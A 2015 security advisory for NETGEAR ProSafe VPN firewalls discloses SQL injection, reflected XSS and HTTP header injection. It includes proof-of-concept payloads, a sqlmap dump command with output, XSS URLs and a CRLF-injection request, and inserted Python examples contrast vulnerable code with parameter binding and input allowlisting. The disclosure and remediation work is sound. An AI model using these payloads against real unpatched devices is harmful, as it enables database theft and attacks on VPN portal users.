NETGEAR ProSafe Cross Site Scripting / SQL Injection / Header Injection

Posted Jun 26, 2015
Authored by Juan J. Guelfo

NETGEAR ProSafe suffers from cross site scripting, header injection, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | d2cffb6c14ae7d6d75847a649433d54664550130dd5ffabcc160493696e70230

About Encripto AS
=================

Encripto is a Norwegian company which provides specialized services within IT-security.
Our core expertise is security testing, network security monitoring and training.
Encripto is committed to information security. We do research to discover trends, new vulnerabilities and better ways to mitigate them.
We believe in acting as good internet citizens to the industry, whether you are a provider or a user.
You can read more about us at http://www.encripto.no



Timeline and revision history
=============================

- 25th of June 2015

The vendor releases firmware version 4.3.3-5, which fixes the vulnerabilities.
Public disclosure of the security advisory.


- 3rd of April 2015

The vendor confirms the presence of the vulnerabilities and provides a provisional list with vulnerable products and firmware versions.


- 31st of March 2015

A new attempt to contact the vendor is made.
The vendor acknowledges the case and proceeds to verify the findings.


- 20th of March 2015

New vulnerabilities are discovered and the advisory is updated.


- 19th of March 2015

Vulnerabilities discovered by the researcher and details shared with the vendor.



Disclaimer
==========

The material presented in this document is for educational purposes only.
Encripto AS cannot be held responsible for any loss or damage caused by any technique presented in this material.
The reader alone is responsible for applying this knowledge, at his / her own risk.
Any trademarks, service marks, collective marks, design rights, personality rights or similar rights that are mentioned, used or cited in this document are the property of their respective owners.



License
=======

This document is licensed under the terms of the Creative Commons Attribution ShareAlike 3.0 license.
More information about this license can be found at http://creativecommons.org/licenses/by-sa/3.0/



Background
==========

According to the vendor, NETGEAR® ProSafe® business-class VPN Firewalls are high-performing routers that provide fully secure network access between headquarters locations, remote/branch offices and remote workers.



Summary
=======

Multiple NETGEAR® ProSafe® routers running firmware versions 4.3.2-7 and 4.3.3-3 are affected by SQL injection, HTTP header injection and multiple reflected cross-site scripting vulnerabilities.



Affected Products
=================

The following table lists the vulnerable products together with their affected firmware versions.


NETGEAR® ProSafe® SRX5308 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS336Gv3 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS336Gv2 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS318N v4.3.2-7 and v4.3.3-3

Previous versions of the firmware could also be affected, but this has not been verified.



Vulnerabilities and Proof of Concept (PoC)
==========================================

The following PoCs assume that the vulnerable device uses a standard configuration and is reachable at https://192.168.1.1


- SQL injection vulnerability
---------------------------

The “portal” parameter of the SSL VPN web application is affected by SQL injection. This could allow an attacker to interact with the SQLite database that supports the device.

Sending the following payloads as portal values produced different responses (the first appended condition is always true, the second is always false):


SSL-VPN47034719'%20or%20'5358'%3d'5358

SSL-VPN47034719'%20or%20'5358'%3d'5359


The vulnerability can be exploited with automated tools such as sqlmap.
The following GET request can be used as the base request (saved to sqli.txt for the command below).

GET /scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Command example:

python sqlmap.py -r sqli.txt -p portal --threads 5 --dump --force-ssl --dbms=sqlite

[…OUTPUT SUPPRESSED…]

[13:51:01] [INFO] GET parameter 'portal' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="NETGEAR ProSafe™ - SSL-VPN")

[…OUTPUT SUPPRESSED…]

GET parameter 'portal' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Parameter: portal (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=portalLogin.htm&portal=SSL-VPN' AND 7037=7037 AND 'iBib'='iBib
---
[13:51:12] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite



For example, the database structure and its contents could be retrieved.

Database: SQLite_masterdb
[238 tables]
+-------------------------------------+
| AlgConf |
| AttackChecks |
| AttackChecks6 |
| AvailableLanHost |
| BandWidthProfile |
| BandWidthProfileSpeed |
| BandWidthProfileStatus |
| BlockSites |
| BwMonStat |

[…OUTPUT SUPPRESSED…]



In addition to the “portal” parameter, the “USERDBDomains.Domainname” and “USERDBUsers.UserName” parameters of the “/scgi-bin/platform.cgi” page exhibited the same behavior.
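To show why the two portal payloads above produce different responses and what the fix looks like, here is an added example (not code from the advisory or from the device firmware) that runs the same lookup against a constructed in-memory SQLite table, once with string concatenation and once with parameter binding; the table name and schema are hypothetical stand-ins for the device's real database.

```python
import sqlite3
from urllib.parse import unquote

def make_db():
    # Constructed stand-in for the device's SQLite portal table (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Portal (PortalName TEXT, Title TEXT)")
    db.execute("INSERT INTO Portal VALUES ('SSL-VPN', 'NETGEAR ProSafe - SSL-VPN')")
    return db

def lookup_vulnerable(db, portal):
    # The pattern behind the advisory's finding: the request parameter is spliced
    # into the SQL text, so a quote in it rewrites the WHERE clause.
    sql = "SELECT Title FROM Portal WHERE PortalName = '" + portal + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_fixed(db, portal):
    # Parameter binding: the value is passed to SQLite as data and can never
    # change the statement structure, whatever characters it contains.
    sql = "SELECT Title FROM Portal WHERE PortalName = ?"
    return [row[0] for row in db.execute(sql, (portal,))]

# The two URL-encoded payloads from the advisory, decoded as the CGI would see them.
TRUE_PAYLOAD = unquote("SSL-VPN47034719'%20or%20'5358'%3d'5358")
FALSE_PAYLOAD = unquote("SSL-VPN47034719'%20or%20'5358'%3d'5359")

def compare():
    # Boolean-based blind behaviour: the vulnerable lookup returns the portal row
    # for the always-true payload and nothing for the always-false one, while the
    # fixed lookup returns nothing for both because no such portal name exists.
    db = make_db()
    return {
        "vuln_true": lookup_vulnerable(db, TRUE_PAYLOAD),
        "vuln_false": lookup_vulnerable(db, FALSE_PAYLOAD),
        "fixed_true": lookup_fixed(db, TRUE_PAYLOAD),
        "fixed_false": lookup_fixed(db, FALSE_PAYLOAD),
    }

if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```

The difference between the two vulnerable results is exactly the signal sqlmap keys on with its --string option; with binding there is no difference to observe.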



- Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities
-------------------------------------------------------------

The “portal”, “Login.PortalName” and “stuMsg” parameters of the SSL VPN web application are affected by reflected XSS.
“Login.PortalName” is originally a POST parameter, but it is accepted via GET as well.

The following links demonstrate the issue. A simple JavaScript payload is used in these examples:

https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN"><script>alert("XSS")</script>
https://192.168.1.1/scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=SSL-VPN"><script>alert("XSS")<%2fscript>&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0
https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN&stuMsg=Usereb<script>alert("XSS")<%2fscript>



- HTTP header injection vulnerability
-----------------------------------

The “Login.PortalName” parameter of the SSL VPN web application is affected by HTTP header injection.
An attacker could leverage this to split HTTP responses or inject new headers.

The following request demonstrates the issue when the payload is submitted in a GET request. The same result can be achieved with a POST request.

GET /scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=c9b54%0d%New-header:+8897%0d%0a&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN
Connection: keep-alive

HTTP/1.0 302 Moved Temporarily
Date: Thu, 31 Jan 2013 06:31:50 GMT
Server: Embedded HTTP Server.
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Location: https://192.168.1.1:443/scgi-bin/platform.cgi?page=portalLogin.htm&portal=c9b54
New-header: 8897
&stuMsg=SSLVPN User authentication Failed. Use the correct SSL portal URL to login.
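The response above shows the decoded parameter landing unfiltered in the Location header. The following added example (not code from the advisory or the firmware) models that redirect builder beside a hardened one that allowlists the portal name and percent-encodes it; the CR/LF value is constructed here to match the injected header shown in the advisory, and the allowlist pattern is an assumption about what valid portal names look like.

```python
import re
from urllib.parse import quote

BASE = "https://192.168.1.1:443/scgi-bin/platform.cgi?page=portalLogin.htm&portal="

# Constructed value equivalent to the advisory's decoded payload: a CR LF pair
# followed by an attacker-chosen header line, then another CR LF.
INJECTED = "c9b54\r\nNew-header: 8897\r\n"

def redirect_vulnerable(portal):
    # Mirrors the behaviour in the advisory: the decoded parameter is concatenated
    # into the Location header value without any filtering, so CR LF inside it
    # terminates the header and starts a new one.
    return "HTTP/1.0 302 Moved Temporarily\r\nLocation: " + BASE + portal + "\r\n\r\n"

# Assumed allowlist for portal names: letters, digits, underscore and hyphen only.
PORTAL_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def redirect_fixed(portal):
    # Hardened form: reject anything outside the allowlist, and percent-encode
    # the value when embedding it in the URL so no control character can ever
    # reach the header section.
    if not PORTAL_RE.match(portal):
        return "HTTP/1.0 400 Bad Request\r\n\r\n"
    location = BASE + quote(portal, safe="")
    return "HTTP/1.0 302 Moved Temporarily\r\nLocation: " + location + "\r\n\r\n"

def header_names(response):
    # Parses the header section the way a client would and returns the header
    # names it sees; an injected line shows up as an extra name.
    head = response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]
    return [line.split(":", 1)[0] for line in lines if ":" in line]

if __name__ == "__main__":
    print(header_names(redirect_vulnerable(INJECTED)))
    print(header_names(redirect_fixed(INJECTED)))
    print(header_names(redirect_fixed("SSL-VPN")))
```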



Remediation
===========

The vendor has released firmware version 4.3.3-5, which fixes the issues.
Encripto encourages product owners to upgrade to this version as soon as possible.



Credit
======

The vulnerabilities were discovered by Juan J. Güelfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no

For more information about Encripto’s research policy, please visit http://www.encripto.no/forskning/



References
==========

http://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf



Special Thanks
==============

Special thanks to Maarten Hoogcarspel from the Netgear support team for his quick response and professional case handling.